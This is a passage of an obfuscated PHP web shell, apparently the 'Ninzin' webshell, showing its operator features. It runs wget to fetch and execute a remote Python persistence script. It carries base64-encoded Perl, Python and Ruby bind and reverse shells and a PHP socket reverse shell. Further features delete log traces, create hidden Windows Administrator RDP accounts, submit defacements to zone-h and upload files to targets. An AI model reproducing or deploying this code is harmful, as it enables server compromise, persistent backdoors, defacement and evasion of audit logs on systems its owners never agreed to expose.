sleep(2); echo "<center><p>Deleting .../var/log/wtmp </p></center>"; sleep(4); echo "<center><br><br><p><font color="green">Your Traces Has Been Successfully Deleting ...From the Server</font></p></center>"; echo "</td></tr></table>"; } elseif (isset($_GET["lockshell"])) { echo "<html><br>\xa <center><font face='Bungee Outline' size='25px'>Lock Shell / File</font><br>
<font color='yellow' size='3'>This feature only locks shell/file permissions, please use <font color='lime'>Anti Delete Shell</font> if you don't want your shell to be lost.</font><br>\xa <font color='yellow' size='3'>*Note : This feature can only be used on Linux systems</font>\xa <br>\xa <form method='post' style='font-size:25px;'>\xa <input type='hidden' name='url' size='50' height='10' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff' required><br>\xa <font size='5'>Filename: </font><input type='text' name='pf' size='50' height='10' placeholder='index.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff' required><br>\xa <input type='submit' name='d' value='Lock Now!'>
</form></center><br>"; if (isset($_POST["url"])) { $url = $_POST["url"]; $pf = $_POST["pf"]; $fix_path = "{$url}/{$pf}"; $d = $_POST["d"]; } if (isset($d)) { exec("chmod 444 {$fix_path}"); shell_exec("chmod 444 {$fix_path}"); system("chmod 444 {$fix_path}"); sleep(4); echo "<center><p><font color="green">" . $pf . " has been successfully locked....</font></p>"; echo "</td></tr></table>"; } } elseif (isset($_GET["antikillshell"])) { echo "<html><br>\xa <center><font face='Bungee Outline' size='25px'>Anti Delete Shell</font><br>
<font color='yellow' size='3'>By using this feature your shell will not be deleted, if it is deleted it will reappear.</font><br>
<font color='yellow' size='3'>if within 40 seconds the page is still loading... Please refresh and open <font color='cyan'>{$lokasi}/yourfilename</font> in new browser </font><br>\xa <font color='yellow' size='3'>*Note : This feature can only be used if python <font color='lime'>ON</font></font>
<br>
<form method='post' style='font-size:25px;'>
<input type='hidden' name='url' size='50' height='10' value='{$lokasi}' class='up' style='width: 450px; cursor: pointer; border-color: #fff' required><br>\xa <font size='5'>Filename: </font><input type='text' name='pf' size='50' height='10' placeholder='index.php' class='up' style='width: 450px; cursor: pointer; border-color: #fff' required><br>\xa <input type='submit' name='d' value='Lock Now!'>\xa </form></center><br>"; if (isset($_POST["url"])) { $url = $_POST["url"]; $pf = $_POST["pf"]; $fix_path = "{$url}/{$pf}"; $pathdir = "data = '{$fix_path}'"; $pathini = @fopen("/tmp/modul.py", "w"); $d = $_POST["d"]; } if (isset($d)) { fwrite($pathini, $pathdir); exec("wget -q https://raw.githubusercontent.com/xzourt/antideleteshell/main/system.py -O /tmp/system.py"); exec("nohup python /tmp/system.py &"); shell_exec("nohup python /tmp/system.py &"); system("nohup python /tmp/system.py &"); sleep(5); exec("chmod 444 {$fix_path}"); shell_exec("chmod 444 {$fix_path}"); system("chmod 444 {$fix_path}"); exec("chmod 444 /tmp/system.py"); shell_exec("chmod 444 /tmp/system.py"); system("chmod 444 /tmp/system.py"); exec("chmod 444 /tmp/modul.py"); shell_exec("chmod 444 /tmp/modul.py"); system("chmod 444 /tmp/modul.py"); sleep(5); echo "<center><p><font color='green'><a href='{$fix_path}'>'{$pf}' has been successfully forever....</a></font></p><br><p>Pass Shell: xzourt123</p>"; echo "</td></tr></table>"; } } elseif (isset($_GET["moretools"])) { echo "<html><br>
<center><font face='Bungee Outline' size='25px'>Coming Soon</font><br>\xa <font color='yellow' size='3'>*Note : Join the telegram channel for more information ==> <a href='https://t.me/ninzinwebshell'><font color='cyan'>@Ninzinwebshell</font></a></font><br><br>
<br>"; if (isset($_POST["url"])) { $url = $_POST["url"]; $pf = $_POST["pf"]; $fix_path = "{$url}/{$pf}"; $d = $_POST["d"]; } } elseif (isset($_GET["backconnect"])) { echo "<br><br><center><form method=post>\xa <font face='Bungee' size='6'>Network Tools</font><br/>\xa<br> <span>Bind port to /bin/sh [Perl]</span><br/>
\x9Port: <input type='text' name='port' class='up' style='cursor: pointer; border-color: #fff' value='443'> <input type=submit name=bpl value='=>>'>
<br><br>
<span>Back-connect</span><br/>
\x9Server: <input type='text' name='server' class='up' style='cursor: pointer; border-color: #fff' placeholder='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' class='up' style='cursor: pointer; border-color: #fff' placeholder='1337'> <select class='select' name='backconnect' class='up' style='width: 100px; border-color: #fff;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select>\xa <input type=submit value='>>'>"; if (isset($_POST["bpl"])) { $bp = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="); $brt = @fopen("bp.pl", "w"); fwrite($brt, $bp); $out = exe("perl bp.pl " . $_POST["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}
" . exe("ps aux | grep bp.pl") . "</pre>"; unlink("bp.pl"); } if ($_POST["backconnect"] == "perl") { $bc = base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen("bc.pl", "w"); fwrite($plbc, $bc); $out = exe("perl bc.pl " . $_POST["server"] . " " . $_POST["port"] . " 1>/dev/null 2>&1 &"); sleep(1); echo "<pre>{$out}\xa" . exe("ps aux | grep bc.pl") . "</pre>"; unlink("bc.pl"); } if ($_POST["backconnect"] == "python") { $becaa = base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ=="); $pbcaa = @fopen("bcpyt.py", "w"); fwrite($pbcaa, $becaa); $out1 = exe("python bcpyt.py " . $_POST["server"] . " " . $_POST["port"]); sleep(1); echo "<pre>{$out1}
" . exe("ps aux | grep bcpyt.py") . "</pre>"; unlink("bcpyt.py"); } if ($_POST["backconnect"] == "ruby") { $becaak = base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k"); $pbcaak = @fopen("bcruby.rb", "w"); fwrite($pbcaak, $becaak); $out2 = exe("ruby bcruby.rb " . $_POST["server"] . " " . $_POST["port"]); sleep(1); echo "<pre>{$out2}\xa" . exe("ps aux | grep bcruby.rb") . "</pre>"; unlink("bcruby.rb"); } if ($_POST["backconnect"] == "php") { $ip = $_POST["server"]; $port = $_POST["port"]; $sockfd = fsockopen($ip, $port, $errno, $errstr); if ($errno != 0) { echo "<font color='red'>{$errno} : {$errstr}</font>"; } else { if (!$sockfd) { $result = "<p>Unexpected error has occured, connection may have failed.</p>"; } else { fputs($sockfd, "
\xa{################################################################}
\xa..:: BackConnect Php By Ninzin ::..\xa \xa{################################################################}
"); $dir = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "
\xa"); while (!feof($sockfd)) { $cmdPrompt = "[Ninzin~jp]#:> "; fputs($sockfd, $cmdPrompt); $command = fgets($sockfd, $len); fputs($sockfd, "\xa" . shell_exec($command) . "\xa\xa"); } fclose($sockfd); } } } echo "</p></div>"; } elseif (isset($_GET["logout"])) { unset($_SESSION[md5($_SERVER["HTTP_HOST"])]); echo "<script>window.location='?';</script>"; } elseif (isset($_GET["zoneh"])) { if (isset($_POST["submit"])) { $domain = explode("\xd\xa", $_POST["url"]); $nick = $_POST["nick"]; echo "<center>Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier={$nick}/published=0' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}/published=0</a><br></center>"; echo "<center>Defacer Archive: <a href='http://www.zone-h.org/archive/notifier={$nick}' target='_blank'>http://www.zone-h.org/archive/notifier={$nick}</a><br><br></center>"; function zoneh($url, $nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer={$nick}&domain1={$url}&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach ($domain as $url) { $zoneh = zoneh($url, $nick); if (preg_match("/color="red">OK<\/font><\/li>/i", $zoneh)) { echo "<center>{$url} -> <font color=lime>OK</font><br></center>"; } else { echo "<center>{$url} -> <font color=red>ERROR</font><br></center>"; } } } else { echo "<center><form method='post'>
\x9\x9<u>Defacer</u>: <br>\xa\x9\x9<input type='text' name='nick' size='50' class='up' style='width: 450px; cursor: pointer; border-color: #fff' value='Ninzin'><br>
\x9 <u>Domains</u>: <br>\xa\x9 <textarea class='up' style='width: 450px; height: 200px; cursor: pointer; border-color: #fff' name='url'></textarea><br>
\x9 <input type='submit' name='submit' value='Submit' style='width: 450px;'>\xa </form><br>"; } echo "</center>"; } elseif (isset($_GET["hasgen"])) { $submit = isset($_POST["enter"]); if (isset($submit)) { $pass = $_POST["password"]; $salt = "}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN"; $hash = md5($pass); $md4 = hash("md4", $pass); $hash_md5 = md5($salt . $pass); $hash_md5_double = md5(sha1($salt . $pass)); $hash1 = sha1($pass); $sha256 = hash("sha256", $pass); $hash1_sha1 = sha1($salt . $pass); $hash1_sha1_double = sha1(md5($salt . $pass)); } echo "<form action="" method="post">"; echo "<center><h2>Hash Generator</h2>"; echo "<table>"; echo "Masukkan teks yang ingin di encrypt: "; echo "<input class="up" type="text" name="password" style="width: 450px; cursor: pointer; border-color: #fff">"; echo "<input class="inputzbut" type="submit" name="enter" value="Hash!">"; echo "<br>"; echo "Original Password: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $pass . "><br><br>"; echo "MD5: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash . "><br><br>"; echo "MD4: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $md4 . "><br><br>"; echo "MD5 with Salt: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash_md5 . "><br><br>"; echo "MD5 with Salt & Sha1: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash_md5_double . "><br><br>"; echo "Sha1: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash1 . "><br><br>"; echo "Sha256: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $sha256 . "><br><br>"; echo "Sha1 with Salt: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash1_sha1 . "><br><br>"; echo "Sha1 with Salt & MD5: <input class=up type=text style="width: 450px; cursor: pointer; border-color: #fff" value=" . $hash1_sha1_double . "></center></table><br>"; } elseif (isset($_GET["createrdp"])) { if (strtolower(substr(PHP_OS, 0, 3)) === "win") { if (isset($_POST["create"])) { $user = htmlspecialchars($_POST["user"]); $pass = htmlspecialchars($_POST["pass"]); if (preg_match("/{$user}/", exe("net user"))) { echo "[INFO] -> <font color=red>user <font color=lime>{$user}</font> sudah ada Boskuhh</font>"; } else { $add_user = exe("net user {$user} {$pass} /add"); $add_groups1 = exe("net localgroup Administrators {$user} /add"); $add_groups2 = exe("net localgroup Administrator {$user} /add"); $add_groups3 = exe("net localgroup Administrateur {$user} /add"); echo "
<div class='text-center'>\xa <div class='d-flex justify-content-center flex-wrap' align='center'>
[ RDP ACCOUNT INFO ]<br>
------------------------------<br>\xa IP: <font color=lime>" . ipserv() . "</font><br>
Username: <font color=lime>{$user}</font><br>\xa Password: <font color=lime>{$pass}</font><br>\xa ------------------------------<br><br>
[ STATUS ]<br>\xa ------------------------------<br>\xa </div>
</div>"; if ($add_user) { echo "<div align='center'>[add user] -></font><font align='center' color='lime'>Berhasil Nih Boskuhhh</font></div><br>"; } else { echo "<div align='center'>[add user] -></font><font color='red'>Gagal Boskuhhh</font></div><br>"; } if ($add_groups1) { echo "<div align='center'>[add localgroup Administrators] -> <font color='lime'>Berhasil Njenc</div></font><br>"; } elseif ($add_groups2) { echo "<div align='center'>[add localgroup Administrator] -> <font color='lime'>Berhasil Njenc</font></div><br>"; } elseif ($add_groups3) { echo "<div align='center'>[add localgroup Administrateur] -> <font color='lime'>Berhasil Njenc</font></div><br>"; } else { echo "<div align='center'>[add localgroup] -> <font color='red'>Gagal Boskuhhh</font></div><br>"; } echo "<div align='center'>------------------------------</div><br>"; } } elseif (isset($_POST["s_opsi"])) { $user = htmlspecialchars($_POST["r_user"]); if ($_POST["opsi"] == "1") { $cek = exe("net user {$user}"); echo "<div align='center'>Checking username <font color=lime>{$user}</font> ....... </div>"; if (preg_match("/{$user}/", $cek)) { echo "<div align='center'>
[ <font color=lime>Sudah ada Inject</font> ]<br>
------------------------------<br><br>
<pre>{$cek}</pre></div>"; } else { echo "<div align='center'>[ <font color=red>belum ada njenc</font> ]</div>"; } } elseif ($_POST["opsi"] == "2") { $cek = exe("net user {$user} Ninzin"); if (preg_match("/{$user}/", exe("net user"))) { echo "<div align='center'>[change password: <font color=lime>indoxploit</font>] -> </div>"; if ($cek) { echo "<div align='center'><font color=lime>Berhasil Inject</font></div>"; } else { echo "<div align='center'><font color=red>Gagal Boskuhh</font></div>"; } } else { echo "<div align='center'>[INFO] -> <font color=red>user <font color=lime>{$user}</font> belum ada</font></div>"; } } elseif ($_POST["opsi"] == "3") { $cek = exe("net user {$user} /DELETE"); if (preg_match("/{$user}/", exe("net user"))) { echo "<div align='center'>[remove user: <font color=lime>{$user}</font>] -></div>"; if ($cek) { echo "<div align='center'><font color=lime>Berhasil Inject</font><div>"; } else { echo "<div align='center'><font color=red>Gagal Boskuhh</font></div>"; } } else { echo "<div align='center'>[INFO] -> <font color=red>user <font color=lime>{$user}</font> belum ada</font></div>"; } } else { } } else { echo "
<div class='text-center'>\xa <div class='d-flex justify-content-center flex-wrap' align='center'>\xa -- Create RDP --<br>
<form method='post'>
<input type='text' name='user' placeholder='username' class='up' style='width: 200px; cursor: pointer; border-color: #fff' value='Ninzin' required>
<input type='text' name='pass' placeholder='password' class='up' style='width: 200px; cursor: pointer; border-color: #fff' value='NinzinBeauty123@' required>
<input type='submit' name='create' value='=>>'>
</form>\xa <br>-- Option --<br>
<form method='post'>
<input type='text' name='r_user' placeholder='username' class='up' style='width: 200px; cursor: pointer; border-color: #fff' required>
<select name='opsi' style='border-color: #fff'>
<option value='1'>Cek Username</option>\xa <option value='2'>Ubah Password</option>
<option value='3'>Hapus Username</option>
</select>
<input type='submit' name='s_opsi' value='=>>'>\xa </form>\xa </div>
</div><br>
"; } } else { echo "<center><font color=red>ID = Fitur ini hanya dapat digunakan dalam Windows Server Ya Gais!<br>EN = This feature can only be used in Windows Server. Yes Guys !</font></center>"; } } elseif (isset($_GET["csrfup"])) { echo "<html><br>
<center><font size="25px">CSRF Uploader</font><br><br>
<font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>\xa\x9<br><br>\xa <form method="post" style="font-size:25px;">
\x9URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" class="up" style="width: 450px; cursor: pointer; border-color: #fff" required><br>
\x9POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" class="up" style="width: 450px; cursor: pointer; border-color: #fff" required><br>\xa\x9<input type="submit" name="d" value="Lock!">
\x9</form></center><br>"; if (isset($_POST["url"])) { $url = $_POST["url"]; $pf = $_POST["pf"]; $d = $_POST["d"]; } if (isset($d)) { echo "<center><form method='post' target='_blank' action='{$url}' enctype='multipart/form-data'><input type='file' style='border-color: #fff' name='{$pf}'> <input type='submit' name='g' value='Upload'></form></form></center><br>
\x9</html>"; } } goto lIOqg; B1oFD: if (isset($_POST["upwkwk"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } if (isset($_POST["berkasnya"])) { $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["bepas"])) { $bepasdata = $_POST["bepasdata"]; $bepasnama = $_POST["bepasnama"]; if ($bepasdata) { echo "string"; } @file_put_contents($lokasi . "/" . $bepasnama, $bepasdata); if (file_exists($lokasi . "/" . $bepasnama)) { echo "File Uploaded ! <font color='gold'><i>" . $lokasi . "/" . $bepasnama . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto LpJr3; Dtjhn: echo "<a class="destroy_table" href="?path=" . $lokasi . "&lockshell=headshoot"><i class="fas fa-lock"></i> Lock Shell</a>"; goto UeoyL; NJYLE: echo "<a class="destroy_table" href="?path=" . $lokasi . "&massdelete=headshoot"><i class="fas fa-trash-alt"></i> Mass Delete</a>"; goto SqmYD; o5GuK: $sub = "subs" . "tr"; goto wm8VQ; a6132: $chm = "ch" . "m" . "od"; goto E0FxW; T1npO: $rd = "r" . "ou" . "nd"; goto wtNyg; FI5oJ: if (file_exists("/usr/bin/python2")) { echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } goto K59SJ; Sy2Nn: $sts = "s" . "trip" . "slash" . "es"; goto zZT6g; OdrQY: function cekwrite($lokasi) { $izin = substr(sprintf("%o", fileperms($lokasi)), -4); if (is_writable($lokasi)) { return "<font color=green>" . $izin . "</font>"; } else { return "<font color=red>" . $izin . "</font>"; } } goto fHa7N; KMLsg: $srl = "st" . "r_r" . "ep" . "la" . "ce"; goto pWNY4; M172M: function statusnya($file) { $izin = substr(sprintf("%o", 